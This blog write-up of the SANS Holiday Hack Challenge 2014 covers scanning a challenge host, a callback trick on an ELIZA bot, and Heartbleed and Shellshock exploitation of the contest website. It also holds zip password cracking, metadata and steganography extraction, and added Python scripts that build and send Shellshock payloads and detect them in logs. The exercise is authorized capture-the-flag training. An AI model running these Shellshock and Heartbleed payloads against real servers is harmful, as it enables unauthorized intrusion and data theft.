Wednesday, March 25, 2015

SANS Holiday Challenge 2014

http://pen-testing.sans.org/holiday-challenge/2014

This is my write-up for the SANS Holiday Challenge 2014.

My write-up got an Honorable Mention:

http://pen-testing.sans.org/blog/pen-testing/2015/02/04/2014-sans-holiday-hack-winners-and-official-answers

The Challenge script

The story of the challenge is divided into five staves. We analyze each of them to extract the clues that lead to the secrets of the Ghosts of Hacking Past, Present, and Future.
Questions:
What secret did the Ghost of Hacking Past include on the system at 173.255.233.59?
What two secrets did the Ghost of Hacking Present deposit on the http://www.scrooge-and-marley.com website? You have permission to attack that website (TCP port 80 and 443 only) with the goal of retrieving those secrets, but please do not attempt any denial of service attacks or performance hogging attacks on that machine.
What four secrets are found on the USB file system image bestowed by the Ghost of Hacking Future?

The Ghost of Hacking Past

The secret of the Ghost of Hacking Past is on 173.255.233.59. Let's analyze this text from Stave 2: The First of the Three Spirits.
"My time grows short," observed the Spirit, as the scene dissolved back into Scrooge's bedroom. "Before I depart, I'd like to introduce you to an old friend of mine. She's at 173.255.233.59 and has an important message to share with you, Scrooge. Feel free to connect with her, surf the Internet together, and see if you can discover her secret."
So a service on 173.255.233.59 holds the secret; we have to connect to it, "surf the Internet together" with it, and coax the secret out.
Step 1: Find which ports and services are open on 173.255.233.59
nmap -sS -O -p1-65535 --script banner 173.255.233.59 -P0
….
31124/tcp open     unknown
|_banner: I AM ELIZA.  WHAT'S ON YOUR MIND?
Conclusion: port 31124/tcp is open and greets us with the banner: I AM ELIZA.  WHAT'S ON YOUR MIND?
Step 2: Talk to the service on port 31124 with netcat
~# nc 173.255.233.59 31124
I AM ELIZA.  WHAT'S ON YOUR MIND?
> hi
HOW DO YOU DO. PLEASE STATE YOUR PROBLEM.
> problem
HAVE OTHER PEOPLE SAID THAT YOU ARE STODGY?
> web
VERY INTERESTING
> computer
DO COMPUTERS WORRY YOU?
> yes
I UNDERSTAND
> no
ARE YOU SAYING 'NO' JUST TO BE NEGATIVE?
Conclusion: it behaves like a chatbot that pattern-matches our input to keep up a conversation.
Step 3: Search for information about ELIZA
ELIZA is a computer program and an early example of primitive natural language processing. ELIZA operated by processing users' responses to scripts, the most famous of which was DOCTOR, a simulation of a Rogerian psychotherapist. Using almost no information about human thought or emotion, DOCTOR sometimes provided a startlingly human-like interaction. ELIZA was written at MIT by Joseph Weizenbaum between 1964 and 1966.
Conclusion: ELIZA is a classic program with many implementations in different languages (Lisp, BASIC, ...).
We could try command injection to force the program to read a file or execute operating-system commands, but we have no idea which language or implementation is running on 173.255.233.59, so there is no obvious injection syntax to target.
We can also play along with ELIZA, social-engineering style, and look for the words that make her give up her secret.
Step 4: Communicate with ELIZA
We send many different words to ELIZA; the most interesting responses come from the word "secret":
> secret
A GIRL'S GOTTA KEEP HER SECRETS.  WHY DON'T YOU ASK ME ABOUT SOMETHING ELSE?
> secret
YOU REALLY ARE INTERESTED IN MY SECRET.  I THINK WE SHOULD GET TO KNOW EACH OTHER BETTER FIRST.  TELL ME ABOUT YOUR FAVOURITE WEBSITES.
> secret
I AM SO SORRY, BUT I CAN'T TELL YOU MY SECRET VIA THIS DIALOG.  I DO REALLY LIKE YOU, BUT I WORRY THAT SOMEONE MAY BE SHOULDER SURFING YOU.  NO ONE IS SHOULDER SURFING ME, THOUGH, SO WHY DON'T YOU GIVE ME A URL THAT I CAN SURF TO?
Conclusion: ELIZA asks for a URL she can surf to. Nice: we prepare a web site that ELIZA can visit and look at the traces she leaves in its logs.
Step 5: Set up a web site that ELIZA can surf to
On a Kali machine, start the Apache web server.
Publish the URL through a URL shortener, e.g. http://tinyurl.com/xxxxxx
Monitor the Apache access log to see who visits the site:
# tail -f /var/log/apache2/access.log
Step 6: Invite ELIZA to visit our web site
In the same way, we try various words that might make ELIZA visit our web site:
URL 
Goto
visit
open
click
download
navigate
……….
ELIZA gives an interesting response when we send the word "link":
> link
DO YOU THINK IT'S SAFE TO CLICK ON LINKS?.
> link
I LOVE CLICKING ON LINKS.  DO YOU HAVE A LINK FOR ME?
Remembering ELIZA's earlier response "GIVE ME A URL THAT I CAN SURF TO", we try the word "surf" followed by our URL:
> surf http://tinyurl.com/xxxxxx
DOES THIS LOOK LIKE THE CORRECT PAGE?
HI ELIZA GIVES ME YOUR SECRET!!!
"HI ELIZA GIVES ME YOUR SECRET!!!" is the title of the default page at http://tinyurl.com/xxxxxx, so ELIZA really did fetch our page.
Conclusion: the words that unlock the conversation with ELIZA are secret, link and surf.
Step 7: Analyze the traces ELIZA left
tail -f /var/log/apache2/access.log
173.255.233.59 - - [29/Dec/2014:07:56:15 +0000] "GET /ip.php HTTP/1.1" 200 306 "-" "Mozilla/5.0 (Bombe; Rotors:36) Eliza Secret: \"Machines take me by surprise with great frequency. -Alan Turing\""
Conclusion: the secret travels in the User-Agent header of ELIZA's request:
User-Agent: Mozilla/5.0 (Bombe; Rotors:36) Eliza Secret: "Machines take me by surprise with great frequency. -Alan Turing"
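The callback technique above, as an added example that is not part of the original write-up: a small Python listener that serves the bait page and records the request line and every header of each visitor, so a secret carried in a header such as User-Agent is seen at once instead of being fished out of the Apache log, plus a parser for the Apache combined log line shown above. The port (8080), the class and function names are my choices; the sample log line is copied from this write-up only so the parser can be exercised offline.

```python
import re
import threading
import time
from http.server import BaseHTTPRequestHandler, HTTPServer

# Apache "combined" log format:
#   ip ident user [time] "request" status size "referer" "user-agent"
# A literal " inside a logged header is written as \" (see the write-up's log
# line), so the agent field is matched as "anything except an unescaped quote".
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" '
    r'"(?P<agent>(?:[^"\\]|\\.)*)"'
)
# Whatever header it rides in, the secret is announced as: Secret: "..."
SECRET_RE = re.compile(r'Secret:\s*"?(?P<secret>[^"]+?)"?\s*$')

# Copied from the write-up's access.log so the parser can be run offline.
SAMPLE_LOG_LINE = (
    r'173.255.233.59 - - [29/Dec/2014:07:56:15 +0000] "GET /ip.php HTTP/1.1" 200 306 "-" '
    r'"Mozilla/5.0 (Bombe; Rotors:36) Eliza Secret: \"Machines take me by surprise '
    r'with great frequency. -Alan Turing\""'
)


def parse_combined_log(line):
    """Split one combined-format line into its fields; None if it is not one."""
    m = COMBINED_RE.match(line)
    if not m:
        return None
    fields = m.groupdict()
    fields["agent"] = fields["agent"].replace('\\"', '"')  # undo Apache's escaping
    return fields


def find_secret(values):
    """First 'Secret: ...' payload found in an iterable of header values, else None."""
    for value in values:
        m = SECRET_RE.search(value)
        if m:
            return m.group("secret")
    return None


class CallbackHandler(BaseHTTPRequestHandler):
    """Serves the bait page and records everything the visitor sent."""
    recorded = []  # shared by all requests; drained by the main loop below

    def do_GET(self):
        CallbackHandler.recorded.append({
            "client": self.client_address[0],
            "path": self.path,
            "headers": dict(self.headers.items()),
        })
        body = b"<html><head><title>HI ELIZA GIVES ME YOUR SECRET!!!</title></head></html>"
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, fmt, *args):  # keep stderr quiet; we print our own summary
        pass


def start_listener(port=8080):
    """Run the callback server in a daemon thread; returns (server, bound port)."""
    server = HTTPServer(("0.0.0.0", port), CallbackHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


if __name__ == "__main__":
    server, port = start_listener()
    print(f"listening on :{port}; hand the target a URL that points here")
    try:
        while True:
            time.sleep(1)
            while CallbackHandler.recorded:
                hit = CallbackHandler.recorded.pop(0)
                print(hit["client"], hit["path"], "->", find_secret(hit["headers"].values()))
    except KeyboardInterrupt:
        server.shutdown()
```

Run it, point the shortened URL at the listener, and every fetch is printed with any secret found in its headers; the parser is there for the case where the only record you have is the existing access.log.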

The Ghost of Hacking Present

The Ghost of Hacking Present left two secrets on the http://www.scrooge-and-marley.com website.

Step 1: Analyze Stave 3: The Second of the Three Spirits

The Spirit shook his head, "It was you who suggested hacks could help 'Decrease the surplus population,' which could apply to dogs or men. Can't you see the implications of your philosophy, Scrooge? To help you understand, I've magically introduced two special secrets on your very own company website, www.scrooge-and-marley.com. Those secrets should shock your heart, teaching you important lessons for all time." And then, in a snap, the Spirit vanished without a trace.

In 2014 there were two major vulnerabilities:

Heartbleed  : http://en.wikipedia.org/wiki/Heartbleed

Shellshock : http://en.wikipedia.org/wiki/Shellshock_(software_bug)

Conclusion: the phrase "Those secrets should shock your heart" points at both of them: shock → Shellshock and heart → Heartbleed.

Step 2: Exploit the Heartbleed vulnerability with Metasploit (23.239.15.124 is the address of www.scrooge-and-marley.com; the DUMP action stores the leaked heartbeat memory as loot)

msf > use auxiliary/scanner/ssl/openssl_heartbleed

 msf auxiliary(openssl_heartbleed) > set RHOSTS 23.239.15.124

 msf auxiliary(openssl_heartbleed) > set ACTION DUMP

 msf auxiliary(openssl_heartbleed) > exploit

[+] 23.239.15.124:443 - Heartbeat response with leak

[*] 23.239.15.124:443 - Heartbeat data stored in /root/.msf4/loot/20141220074816_default_23.239.15.124_openssl.heartble_128640.bin

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

#strings /root/.msf4/loot/20141220074816_default_23.239.15.124_openssl.heartble_128640.bin

It was shrouded in a deep black garment, which concealed its head, its face, its form, and left nothing of it visible save one outstretched hand. But for this it would have been difficult to detach its figure from the night, and separate it from the darkness by which it was surrounded. &Website Secret #1=Hacking can be noble.

Conclusion:  Website Secret #1=Hacking can be noble.

Step 3: Brute-force directory and file names

Using DirBuster from https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project

Conclusion: there is a shell script at /cgi-bin/submit.sh

Step 4: Test whether the script submit.sh is vulnerable to Shellshock

Using the RESTClient Firefox plugin we inject into the User-Agent header:

User-Agent= () { test;};echo \"Content-type: text/plain\"; echo; echo; pwd

Conclusion: the script returns the output of pwd, so the website is vulnerable to Shellshock.

Step 5: Discover which commands work

We keep sending the injection in the User-Agent header with different commands (ls, cat, more, ...):

User-Agent= () { test;};echo \"Content-type: text/plain\"; echo; echo; command

Conclusion: the only commands that produce output are pwd, cd and echo, all of them bash builtins; external programs such as ls and cat give nothing back, so we are effectively in a restricted shell.

Step 6: Bypassing the restricted shell

Replace ls with shell globbing: echo * expands to the directory contents using only a builtin.

Send the command cd /var/www && echo *

User-Agent=() { test;};echo \"Content-type: text/plain\"; echo; echo; cd /var/www && echo *

Send the command cd / && echo *

User-Agent=() { test;};echo \"Content-type: text/plain\"; echo; echo; cd / && echo *

Conclusion: the listing of / shows a file named "secret".

Step 7: Reading the file secret

Read the file with builtins only (the redirection and the loop are handled by bash itself, no cat needed): while read line; do echo -e "$line"; done < /secret

User-Agent=() { test;};echo \"Content-type: text/plain\"; echo; echo; while read line; do echo -e "$line"; done < /secret

Conclusion: Website Secret #2: Use your skills for good.
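The Shellshock procedure of steps 4 to 7, as an added example that is not part of the original write-up: a Python script that builds the injected User-Agent value (the quotes go into the header literally, since the value is copied straight into the CGI environment), the builtin-only listing and file-read commands, a local check of the bash on your own machine, and, for the defender, a detector that flags the same signature in Apache access-log lines. The host name and the /cgi-bin/submit.sh path are from this write-up; the sample log lines are constructed here, not taken from the challenge host, and the function names are mine. send_shellshock() talks to the network and only runs when you call it.

```python
import re
import shutil
import subprocess
import urllib.request

TARGET = "http://www.scrooge-and-marley.com/cgi-bin/submit.sh"  # from the write-up


def shellshock_header(command):
    """User-Agent value for the injection.

    Unpatched bash (CVE-2014-6271) turns any environment variable whose value
    starts with '() {' into a function definition and keeps parsing, so the text
    after the closing brace is executed.  Apache's CGI module exports User-Agent
    as HTTP_USER_AGENT, which is how a request header reaches bash.  The two echo
    lines emit a minimal CGI header block so Apache relays the command's stdout
    instead of answering with a 500 error.
    """
    return '() { :;}; echo "Content-type: text/plain"; echo; echo; ' + command


def list_dir_command(path):
    """Directory listing with builtins only: the glob is expanded by bash itself."""
    return f"cd {path} && echo *"


def read_file_command(path):
    """File read with builtins only: redirection and the loop never exec a binary."""
    return f'while read line; do echo "$line"; done < {path}'


def send_shellshock(command, url=TARGET, timeout=10):
    """Fire one injected request and return the script's output (network; call explicitly)."""
    req = urllib.request.Request(url, headers={"User-Agent": shellshock_header(command)})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


def local_bash_vulnerable():
    """Classic local check; True if the trailing command ran, None if bash is absent."""
    bash = shutil.which("bash")
    if not bash:
        return None
    probe = subprocess.run([bash, "-c", "echo probe"],
                           env={"x": "() { :;}; echo VULNERABLE"},
                           capture_output=True, text=True)
    return "VULNERABLE" in probe.stdout


# Defender side: the same signature in Apache access logs.  A function
# definition inside a header value has no business in a normal request.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

# Constructed sample lines (not from the challenge host's real log).
SAMPLE_LOG = [
    '10.0.0.5 - - [20/Dec/2014:07:48:16 +0000] "GET /cgi-bin/submit.sh HTTP/1.1" 200 12 "-" '
    '"() { :;}; echo \\"Content-type: text/plain\\"; echo; echo; cd / && echo *"',
    '10.0.0.9 - - [20/Dec/2014:07:48:20 +0000] "GET /index.html HTTP/1.1" 200 4312 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.5 - - [20/Dec/2014:07:48:25 +0000] "GET /cgi-bin/submit.sh HTTP/1.1" 200 30 "-" '
    '"() { test;};echo \\"Content-type: text/plain\\"; echo; echo; pwd"',
]


def detect_shellshock(log_lines):
    """(source ip, matched fragment) for every line carrying the '() { ...};' signature."""
    hits = []
    for line in log_lines:
        m = SHELLSHOCK_RE.search(line)
        if m:
            hits.append((line.split(" ", 1)[0], m.group(0)))
    return hits


if __name__ == "__main__":
    print("local bash vulnerable:", local_bash_vulnerable())
    for ip, fragment in detect_shellshock(SAMPLE_LOG):
        print(f"shellshock attempt from {ip}: {fragment}")
    print("payload for reading /secret:", shellshock_header(read_file_command("/secret")))
```

The detector is deliberately loose (any "() { ... };" in a request line) because attackers vary the function body; tune it on your own logs before alerting on it.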

The Ghost of Hacking Future

The last four secrets are on the USB file-system image.

Step 1: Extract files from the USB file-system image

On the Kali machine we use testdisk to recover files from the image; it lists three files, and its Undelete function reveals one additional, deleted file:

Conclusion: with testdisk we have four files:

LetterFromJackToChuck.doc

hh2014-chat.pcapng:Bed_Curtains.zip

hh2014-chat.pcapng

Tiny_Tom_Crutches_Final.jpg

The colon in hh2014-chat.pcapng:Bed_Curtains.zip is NTFS notation for an alternate data stream: the zip is stored in a named stream attached to the capture file, and testdisk lists that stream as a file of its own.

Step 2: Analyze LetterFromJackToChuck.doc

root@kali:~/sans# file LetterFromJackToChuck.doc

LetterFromJackToChuck.doc: Composite Document File V2 Document, Little Endian, Os: MacOS, Version 10.3, Code page: 10000, Author: Jonathan Pease, Template: Normal.dotm, Last Saved By: Jonathan Pease, Revision Number: 1, Name of Creating Application: Microsoft Macintosh Word, Total Editing Time: 04:00, Create Time/Date: Mon Dec 25 14:27:00 2034, Last Saved Time/Date: Mon Dec 25 14:31:00 2034, Number of Pages: 1, Number of Words: 156, Number of Characters: 737, Security: 0

root@kali:~/sans# exiftool LetterFromJackToChuck.doc

ExifTool Version Number         : 8.60

File Name                       : LetterFromJackToChuck.doc

Directory                       : .

File Size                       : 81 kB

File Modification Date/Time     : 2034:12:26 03:10:10+00:00

File Permissions                : rw-r--r--

File Type                       : DOC

MIME Type                       : application/msword

Title                           :

Subject                         :

Author                          : Jonathan Pease

Keywords                        :

Comments                        :

Template                        : Normal.dotm

Last Modified By                : Jonathan Pease

Revision Number                 : 1

Software                        : Microsoft Macintosh Word

Total Edit Time                 : 4.0 minutes

Create Date                     : 2034:12:25 14:27:00

Modify Date                     : 2034:12:25 14:31:00

Pages                           : 1

Words                           : 156

Characters                      : 737

Security                        : None

Thumbnail Clip                  : (Binary data 4056 bytes, use -b option to extract)

Category                        :

Manager                         : None. I run the company!

Company                         : Generic Victorian Company

Lines                           : 35

Paragraphs                      : 12

Char Count With Spaces          : 881

App Version                     : 14.0000

Scale Crop                      : No

Links Up To Date                : No

Shared Doc                      : No

Hyperlinks Changed              : No

Title Of Parts                  :

Heading Pairs                   : Title, 1

Code Page                       : Mac Roman (Western European)

Hyperlink Base                  :

Secret                          : USB Secret #1: Your demise is a source of mirth.

Comp Obj User Type Len          : 32

Comp Obj User Type              : Microsoft Word 97-2004 Document

root@kali:~/sans#

Conclusion: the first secret sits in a custom metadata field (Secret) of LetterFromJackToChuck.doc:

USB Secret #1: Your demise is a source of mirth.

Step 3: Analyze hh2014-chat.pcapng:Bed_Curtains.zip

root@kali:~/sans# file hh2014-chat.pcapng:Bed_Curtains.zip

hh2014-chat.pcapng:Bed_Curtains.zip: Zip archive data, at least v2.0 to extract

root@kali:~/sans# unzip hh2014-chat.pcapng:Bed_Curtains.zip

Archive:  hh2014-chat.pcapng:Bed_Curtains.zip

[hh2014-chat.pcapng:Bed_Curtains.zip] Bed_Curtains.png password:

password incorrect--reenter:

password incorrect--reenter:

   skipping: Bed_Curtains.png        incorrect password

root@kali:/usr/share/wordlists# fcrackzip -v -D -u -p rockyou.txt  hh2014-chat.pcapng:Bed_Curtains.zip Bed_Curtains.png

found file 'Bed_Curtains.png', (size cp/uc 1429113/1434946, flags 9, chk 4d1a)

checking pw budayday

checking pw bb468971

checking pw udei9Qui

PASSWORD FOUND!!!!: pw == shambolic

root@kali:~/sans# unzip hh2014-chat.pcapng:Bed_Curtains.zip

Archive:  hh2014-chat.pcapng:Bed_Curtains.zip

[hh2014-chat.pcapng:Bed_Curtains.zip] Bed_Curtains.png password:

inflating: Bed_Curtains.png

root@kali:~/sans# exiftool Bed_Curtains.png

ExifTool Version Number         : 8.60

File Name                       : Bed_Curtains.png

Directory                       : .

File Size                       : 1401 kB

File Modification Date/Time     : 2014:12:09 09:40:52+00:00

File Permissions                : rwxrwxrwx

File Type                       : PNG

MIME Type                       : image/png

Image Width                     : 1369

Image Height                    : 1046

Bit Depth                       : 8

Color Type                      : RGB with Alpha

Compression                     : Deflate/Inflate

Filter                          : Adaptive

Interlace                       : Noninterlaced

SRGB Rendering                  : Perceptual

XMP Toolkit                     : XMP Core 5.4.0

Photometric Interpretation      : RGB

Orientation                     : Horizontal (normal)

Comment                         : USB Secret #3: Your demise is a source of gain for others.

Exif Byte Order                 : Big-endian (Motorola, MM)

X Resolution                    : 72

Y Resolution                    : 72

Resolution Unit                 : inches

Modify Date                     : 2034:12:25 13:30:00

Y Cb Cr Positioning             : Centered

Image Size                      : 1369x1046

Conclusion: a dictionary attack on the zip password (shambolic) lets us extract Bed_Curtains.png, and the Comment field in the PNG's metadata holds USB Secret #3.

Step 4: Analyze hh2014-chat.pcapng

root@kali:~/sans# file hh2014-chat.pcapng

hh2014-chat.pcapng: pcap-ng capture file - version 1.0

Before looking at the captured traffic, inspect the file's own metadata (for example with http://pcapng.com/): the capture's comment holds a base64 string, which decodes to:

root@kali:~# echo "VVNCIFNlY3JldCAjMjogWW91ciBkZW1pc2UgaXMgYSBzb3VyY2Ugb2YgcmVsaWVmLg==" | base64 -d

USB Secret #2: Your demise is a source of relief.
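The metadata step above, as an added example that is not part of the original write-up: a Python parser for the pcapng Section Header Block that pulls out its opt_comment options (the free-text capture metadata that pcapng.com displayed for me) and tries to base64-decode each one. The capture it runs on is constructed inline, a single section header carrying the base64 string from this write-up and no packets, not the real hh2014-chat.pcapng; the function names are mine.

```python
import base64
import binascii
import struct
import sys

SHB_TYPE = 0x0A0D0D0A    # Section Header Block; its bytes read the same in either byte order
BOM_MAGIC = 0x1A2B3C4D   # byte-order magic stored inside the SHB
OPT_ENDOFOPT, OPT_COMMENT = 0, 1


def _options(buf, endian):
    """Yield (code, value) pairs from a pcapng option list; values are padded to 4 bytes."""
    off = 0
    while off + 4 <= len(buf):
        code, length = struct.unpack(endian + "HH", buf[off:off + 4])
        off += 4
        if code == OPT_ENDOFOPT:
            return
        yield code, buf[off:off + length]
        off += (length + 3) & ~3


def shb_comments(data):
    """Every opt_comment string from every Section Header Block in a pcapng file."""
    comments, endian, off = [], "<", 0
    while off + 8 <= len(data):
        btype = struct.unpack("<I", data[off:off + 4])[0]
        if btype == SHB_TYPE:
            if off + 12 > len(data):
                raise ValueError(f"truncated section header at offset {off}")
            # The magic at offset 8 fixes the byte order for this whole section.
            magic = struct.unpack("<I", data[off + 8:off + 12])[0]
            endian = "<" if magic == BOM_MAGIC else ">"
        blen = struct.unpack(endian + "I", data[off + 4:off + 8])[0]
        if blen < 12 or blen % 4 or off + blen > len(data):
            raise ValueError(f"corrupt or truncated block at offset {off}")
        if btype == SHB_TYPE:
            # body = magic(4) major(2) minor(2) section_len(8), options, trailing length(4)
            for code, value in _options(data[off + 24:off + blen - 4], endian):
                if code == OPT_COMMENT:
                    comments.append(value.decode("utf-8", "replace"))
        off += blen  # every other block type is skipped by its length
    return comments


def try_base64(text):
    """Decoded text if the comment is strict base64 for printable ASCII, else None."""
    try:
        decoded = base64.b64decode(text.strip(), validate=True).decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    return decoded if decoded and decoded.isprintable() else None


def secrets_from_pcapng(data):
    """(comment, decoded) for each SHB comment that hides base64-encoded text."""
    out = []
    for comment in shb_comments(data):
        decoded = try_base64(comment)
        if decoded is not None:
            out.append((comment, decoded))
    return out


def build_shb(comment, endian="<"):
    """Construct a minimal pcapng file: a single SHB whose only option is opt_comment."""
    cbytes = comment.encode()
    opts = struct.pack(endian + "HH", OPT_COMMENT, len(cbytes)) + cbytes + b"\0" * ((-len(cbytes)) % 4)
    opts += struct.pack(endian + "HH", OPT_ENDOFOPT, 0)
    body = struct.pack(endian + "IHHq", BOM_MAGIC, 1, 0, -1) + opts  # version 1.0, unknown section length
    total = 12 + len(body)                                          # type + length + body + length
    return struct.pack(endian + "II", SHB_TYPE, total) + body + struct.pack(endian + "I", total)


# Constructed stand-in for hh2014-chat.pcapng: the write-up's base64 string as the SHB comment.
B64_COMMENT = "VVNCIFNlY3JldCAjMjogWW91ciBkZW1pc2UgaXMgYSBzb3VyY2Ugb2YgcmVsaWVmLg=="
SAMPLE_PCAPNG = build_shb(B64_COMMENT)

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_PCAPNG
    for comment, decoded in secrets_from_pcapng(data):
        print(f"{comment}\n  -> {decoded}")
```

Run it with a real capture as the first argument; the parser walks every block by its length, so a comment in a second section header (appended captures) is found too, and comments that are not base64 are simply left alone.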

Step 5: Analyze Tiny_Tom_Crutches_Final.jpg

The JPEG hides a message with F5 steganography; we extract it with the F5 tool, run without specifying a password:

root@kali:~# wget http://f5-steganography.googlecode.com/files/f5.jar

java -jar f5.jar x -e out.txt Tiny_Tom_Crutches_Final.jpg

root@kali:~/sans# more out.txt

Tiny Tom has died.

USB Secret #4: You can prevent much grief and cause much joy. Hack for good, not evil or greed.

Conclusion: the four USB secrets are:

USB Secret #1

Your demise is a source of mirth.

USB Secret #2

Your demise is a source of relief.

USB Secret #3

Your demise is a source of gain for others.

USB Secret #4

You can prevent much grief and cause much joy. Hack for good, not evil or greed.

Secrets of the Ghosts of Hacking Past, Present, and Future

Eliza Secret

Machines take me by surprise with great frequency. -Alan Turing

Website Secret #1

Hacking can be noble.

Website Secret #2

Use your skills for good.

USB Secret #1

Your demise is a source of mirth.

USB Secret #2

Your demise is a source of relief.

USB Secret #3

Your demise is a source of gain for others.

USB Secret #4

You can prevent much grief and cause much joy. Hack for good, not evil or greed.
